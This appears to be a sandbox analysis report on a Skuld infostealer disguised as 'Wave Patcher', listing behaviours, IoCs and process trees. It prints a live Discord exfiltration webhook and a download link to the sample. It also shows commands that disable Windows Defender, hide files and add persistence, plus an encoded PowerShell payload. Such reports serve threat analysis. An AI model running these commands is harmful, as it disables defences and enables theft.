skuld | hxxps://www[.]mediafire[.]com/file/5m68x2gx8mpqc9k/Wave_Patcher[.]rar/file

Resubmissions

14/03/2025, 18:59

250314-xngmvaxscy 4

27/07/2024, 21:38

240727-1hhvhatcke 10

Analysis

max time kernel
268s
max time network
203s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
27/07/2024, 21:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://www.mediafire.com/file/5m68x2gx8mpqc9k/Wave_Patcher.rar/file

Score

10^/10

skuld credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer

Malware Config

Extracted

Family

skuld

https://discord.com/api/webhooks/1266866341571461145/w77pxgx17qK5NC3jPAoiGlU17x5HMUhUrIPtzVPCNb94ddb5gjD2NOd-1mDz4Ca_u0g7

Signatures

Skuld stealer
An info stealer written in Go lang.
stealer skuld
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3860	powershell.exe
3776	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Wave Patcher.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Executes dropped EXE 1 IoCs

pid	Process
4684	Wave Patcher.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe"	Wave Patcher.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
229	discord.com
230	discord.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
217	api.ipify.org
218	api.ipify.org
220	ip-api.com

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	Wave Patcher.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	Wave Patcher.exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4860	netsh.exe

Detects videocard installed 1 TTPs 2 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3048	wmic.exe
216	wmic.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	221	Go-http-client/1.1

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2740	msedge.exe
2740	msedge.exe
5008	msedge.exe
5008	msedge.exe
4628	msedge.exe
4628	msedge.exe
4684	Wave Patcher.exe
4684	Wave Patcher.exe
4684	Wave Patcher.exe
4684	Wave Patcher.exe
4684	Wave Patcher.exe
4684	Wave Patcher.exe
4684	Wave Patcher.exe
4684	Wave Patcher.exe
3776	powershell.exe
3776	powershell.exe
4684	Wave Patcher.exe
4684	Wave Patcher.exe
3776	powershell.exe
4684	Wave Patcher.exe
4684	Wave Patcher.exe
4684	Wave Patcher.exe
4684	Wave Patcher.exe
4684	Wave Patcher.exe
4684	Wave Patcher.exe
4684	Wave Patcher.exe
4684	Wave Patcher.exe
4684	Wave Patcher.exe
4684	Wave Patcher.exe
4684	Wave Patcher.exe
4684	Wave Patcher.exe
4684	Wave Patcher.exe
4684	Wave Patcher.exe
4684	Wave Patcher.exe
4684	Wave Patcher.exe
4684	Wave Patcher.exe
4684	Wave Patcher.exe
4684	Wave Patcher.exe
4684	Wave Patcher.exe
4684	Wave Patcher.exe
4684	Wave Patcher.exe
4684	Wave Patcher.exe
4684	Wave Patcher.exe
3860	powershell.exe
3860	powershell.exe
4684	Wave Patcher.exe
4684	Wave Patcher.exe
3860	powershell.exe
4684	Wave Patcher.exe
4684	Wave Patcher.exe
4684	Wave Patcher.exe
4684	Wave Patcher.exe
4684	Wave Patcher.exe
4684	Wave Patcher.exe
4684	Wave Patcher.exe
4684	Wave Patcher.exe
4684	Wave Patcher.exe
4684	Wave Patcher.exe
4684	Wave Patcher.exe
4684	Wave Patcher.exe
4684	Wave Patcher.exe
4684	Wave Patcher.exe
4684	Wave Patcher.exe
4684	Wave Patcher.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	4672	7zG.exe
Token: 35	4672	7zG.exe
Token: SeSecurityPrivilege	4672	7zG.exe
Token: SeSecurityPrivilege	4672	7zG.exe
Token: SeDebugPrivilege	4684	Wave Patcher.exe
Token: SeIncreaseQuotaPrivilege	3060	wmic.exe
Token: SeSecurityPrivilege	3060	wmic.exe
Token: SeTakeOwnershipPrivilege	3060	wmic.exe
Token: SeLoadDriverPrivilege	3060	wmic.exe
Token: SeSystemProfilePrivilege	3060	wmic.exe
Token: SeSystemtimePrivilege	3060	wmic.exe
Token: SeProfSingleProcessPrivilege	3060	wmic.exe
Token: SeIncBasePriorityPrivilege	3060	wmic.exe
Token: SeCreatePagefilePrivilege	3060	wmic.exe
Token: SeBackupPrivilege	3060	wmic.exe
Token: SeRestorePrivilege	3060	wmic.exe
Token: SeShutdownPrivilege	3060	wmic.exe
Token: SeDebugPrivilege	3060	wmic.exe
Token: SeSystemEnvironmentPrivilege	3060	wmic.exe
Token: SeRemoteShutdownPrivilege	3060	wmic.exe
Token: SeUndockPrivilege	3060	wmic.exe
Token: SeManageVolumePrivilege	3060	wmic.exe
Token: 33	3060	wmic.exe
Token: 34	3060	wmic.exe
Token: 35	3060	wmic.exe
Token: 36	3060	wmic.exe
Token: SeIncreaseQuotaPrivilege	3060	wmic.exe
Token: SeSecurityPrivilege	3060	wmic.exe
Token: SeTakeOwnershipPrivilege	3060	wmic.exe
Token: SeLoadDriverPrivilege	3060	wmic.exe
Token: SeSystemProfilePrivilege	3060	wmic.exe
Token: SeSystemtimePrivilege	3060	wmic.exe
Token: SeProfSingleProcessPrivilege	3060	wmic.exe
Token: SeIncBasePriorityPrivilege	3060	wmic.exe
Token: SeCreatePagefilePrivilege	3060	wmic.exe
Token: SeBackupPrivilege	3060	wmic.exe
Token: SeRestorePrivilege	3060	wmic.exe
Token: SeShutdownPrivilege	3060	wmic.exe
Token: SeDebugPrivilege	3060	wmic.exe
Token: SeSystemEnvironmentPrivilege	3060	wmic.exe
Token: SeRemoteShutdownPrivilege	3060	wmic.exe
Token: SeUndockPrivilege	3060	wmic.exe
Token: SeManageVolumePrivilege	3060	wmic.exe
Token: 33	3060	wmic.exe
Token: 34	3060	wmic.exe
Token: 35	3060	wmic.exe
Token: 36	3060	wmic.exe
Token: SeIncreaseQuotaPrivilege	3048	wmic.exe
Token: SeSecurityPrivilege	3048	wmic.exe
Token: SeTakeOwnershipPrivilege	3048	wmic.exe
Token: SeLoadDriverPrivilege	3048	wmic.exe
Token: SeSystemProfilePrivilege	3048	wmic.exe
Token: SeSystemtimePrivilege	3048	wmic.exe
Token: SeProfSingleProcessPrivilege	3048	wmic.exe
Token: SeIncBasePriorityPrivilege	3048	wmic.exe
Token: SeCreatePagefilePrivilege	3048	wmic.exe
Token: SeBackupPrivilege	3048	wmic.exe
Token: SeRestorePrivilege	3048	wmic.exe
Token: SeShutdownPrivilege	3048	wmic.exe
Token: SeDebugPrivilege	3048	wmic.exe
Token: SeSystemEnvironmentPrivilege	3048	wmic.exe
Token: SeRemoteShutdownPrivilege	3048	wmic.exe
Token: SeUndockPrivilege	3048	wmic.exe
Token: SeManageVolumePrivilege	3048	wmic.exe

Suspicious use of FindShellTrayWindow 48 IoCs

pid	Process
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
4672	7zG.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe
5008	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5008 wrote to memory of 2484	5008	msedge.exe	85
PID 5008 wrote to memory of 2484	5008	msedge.exe	85
PID 5008 wrote to memory of 4440	5008	msedge.exe	86
PID 5008 wrote to memory of 4440	5008	msedge.exe	86
PID 5008 wrote to memory of 4440	5008	msedge.exe	86
PID 5008 wrote to memory of 4440	5008	msedge.exe	86
PID 5008 wrote to memory of 4440	5008	msedge.exe	86
PID 5008 wrote to memory of 4440	5008	msedge.exe	86
PID 5008 wrote to memory of 4440	5008	msedge.exe	86
PID 5008 wrote to memory of 4440	5008	msedge.exe	86
PID 5008 wrote to memory of 4440	5008	msedge.exe	86
PID 5008 wrote to memory of 4440	5008	msedge.exe	86
PID 5008 wrote to memory of 4440	5008	msedge.exe	86
PID 5008 wrote to memory of 4440	5008	msedge.exe	86
PID 5008 wrote to memory of 4440	5008	msedge.exe	86
PID 5008 wrote to memory of 4440	5008	msedge.exe	86
PID 5008 wrote to memory of 4440	5008	msedge.exe	86
PID 5008 wrote to memory of 4440	5008	msedge.exe	86
PID 5008 wrote to memory of 4440	5008	msedge.exe	86
PID 5008 wrote to memory of 4440	5008	msedge.exe	86
PID 5008 wrote to memory of 4440	5008	msedge.exe	86
PID 5008 wrote to memory of 4440	5008	msedge.exe	86
PID 5008 wrote to memory of 4440	5008	msedge.exe	86
PID 5008 wrote to memory of 4440	5008	msedge.exe	86
PID 5008 wrote to memory of 4440	5008	msedge.exe	86
PID 5008 wrote to memory of 4440	5008	msedge.exe	86
PID 5008 wrote to memory of 4440	5008	msedge.exe	86
PID 5008 wrote to memory of 4440	5008	msedge.exe	86
PID 5008 wrote to memory of 4440	5008	msedge.exe	86
PID 5008 wrote to memory of 4440	5008	msedge.exe	86
PID 5008 wrote to memory of 4440	5008	msedge.exe	86
PID 5008 wrote to memory of 4440	5008	msedge.exe	86
PID 5008 wrote to memory of 4440	5008	msedge.exe	86
PID 5008 wrote to memory of 4440	5008	msedge.exe	86
PID 5008 wrote to memory of 4440	5008	msedge.exe	86
PID 5008 wrote to memory of 4440	5008	msedge.exe	86
PID 5008 wrote to memory of 4440	5008	msedge.exe	86
PID 5008 wrote to memory of 4440	5008	msedge.exe	86
PID 5008 wrote to memory of 4440	5008	msedge.exe	86
PID 5008 wrote to memory of 4440	5008	msedge.exe	86
PID 5008 wrote to memory of 4440	5008	msedge.exe	86
PID 5008 wrote to memory of 4440	5008	msedge.exe	86
PID 5008 wrote to memory of 2740	5008	msedge.exe	87
PID 5008 wrote to memory of 2740	5008	msedge.exe	87
PID 5008 wrote to memory of 4888	5008	msedge.exe	88
PID 5008 wrote to memory of 4888	5008	msedge.exe	88
PID 5008 wrote to memory of 4888	5008	msedge.exe	88
PID 5008 wrote to memory of 4888	5008	msedge.exe	88
PID 5008 wrote to memory of 4888	5008	msedge.exe	88
PID 5008 wrote to memory of 4888	5008	msedge.exe	88
PID 5008 wrote to memory of 4888	5008	msedge.exe	88
PID 5008 wrote to memory of 4888	5008	msedge.exe	88
PID 5008 wrote to memory of 4888	5008	msedge.exe	88
PID 5008 wrote to memory of 4888	5008	msedge.exe	88
PID 5008 wrote to memory of 4888	5008	msedge.exe	88
PID 5008 wrote to memory of 4888	5008	msedge.exe	88
PID 5008 wrote to memory of 4888	5008	msedge.exe	88
PID 5008 wrote to memory of 4888	5008	msedge.exe	88
PID 5008 wrote to memory of 4888	5008	msedge.exe	88
PID 5008 wrote to memory of 4888	5008	msedge.exe	88
PID 5008 wrote to memory of 4888	5008	msedge.exe	88
PID 5008 wrote to memory of 4888	5008	msedge.exe	88
PID 5008 wrote to memory of 4888	5008	msedge.exe	88
PID 5008 wrote to memory of 4888	5008	msedge.exe	88

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2088	attrib.exe
4828	attrib.exe
1060	attrib.exe
2204	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.mediafire.com/file/5m68x2gx8mpqc9k/Wave_Patcher.rar/file
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5008
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffce1a846f8,0x7ffce1a84708,0x7ffce1a84718
  2⤵
  PID:2484
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,2302897963856200515,3343385406344153578,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2
  2⤵
  PID:4440
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,2302897963856200515,3343385406344153578,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2740
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,2302897963856200515,3343385406344153578,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2864 /prefetch:8
  2⤵
  PID:4888
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,2302897963856200515,3343385406344153578,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
  2⤵
  PID:2460
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,2302897963856200515,3343385406344153578,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1
  2⤵
  PID:228
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2144,2302897963856200515,3343385406344153578,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5276 /prefetch:8
  2⤵
  PID:4640
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,2302897963856200515,3343385406344153578,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5628 /prefetch:1
  2⤵
  PID:4208
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,2302897963856200515,3343385406344153578,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4696 /prefetch:1
  2⤵
  PID:2988
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,2302897963856200515,3343385406344153578,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3676 /prefetch:1
  2⤵
  PID:4748
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,2302897963856200515,3343385406344153578,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:1
  2⤵
  PID:4280
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2144,2302897963856200515,3343385406344153578,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6224 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4628
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,2302897963856200515,3343385406344153578,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5064 /prefetch:1
  2⤵
  PID:2464
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,2302897963856200515,3343385406344153578,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3508 /prefetch:1
  2⤵
  PID:1060
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --field-trial-handle=2144,2302897963856200515,3343385406344153578,131072 --lang=en-US --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=3512 /prefetch:8
  2⤵
  PID:2616

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3340

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4356

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4140

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:4208

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Wave Patcher\" -spe -an -ai#7zMap11890:86:7zEvent22385
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4672

C:\Users\Admin\Downloads\Wave Patcher\Wave Patcher.exe
"C:\Users\Admin\Downloads\Wave Patcher\Wave Patcher.exe"
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Maps connected drives based on registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4684
- C:\Windows\system32\attrib.exe
  attrib +h +s "C:\Users\Admin\Downloads\Wave Patcher\Wave Patcher.exe"
  2⤵
  - Views/modifies file attributes
  PID:2088
- C:\Windows\System32\Wbem\wmic.exe
  wmic csproduct get UUID
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3060
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
  2⤵
  - Views/modifies file attributes
  PID:4828
- C:\Windows\System32\Wbem\wmic.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Suspicious use of AdjustPrivilegeToken
  PID:3048
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads\Wave Patcher\Wave Patcher.exe"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:3776
- C:\Windows\System32\Wbem\wmic.exe
  wmic os get Caption
  2⤵
  PID:1692
- C:\Windows\System32\Wbem\wmic.exe
  wmic cpu get Name
  2⤵
  PID:4968
- C:\Windows\System32\Wbem\wmic.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:216
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:3860
- C:\Windows\System32\Wbem\wmic.exe
  wmic csproduct get UUID
  2⤵
  PID:4240
- C:\Windows\system32\netsh.exe
  netsh wlan show profiles
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Network Configuration Discovery: Wi-Fi Discovery
  PID:4860
- C:\Windows\system32\attrib.exe
  attrib -r C:\Windows\System32\drivers\etc\hosts
  2⤵
  - Drops file in Drivers directory
  - Views/modifies file attributes
  PID:1060
- C:\Windows\system32\attrib.exe
  attrib +r C:\Windows\System32\drivers\etc\hosts
  2⤵
  - Drops file in Drivers directory
  - Views/modifies file attributes
  PID:2204
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAg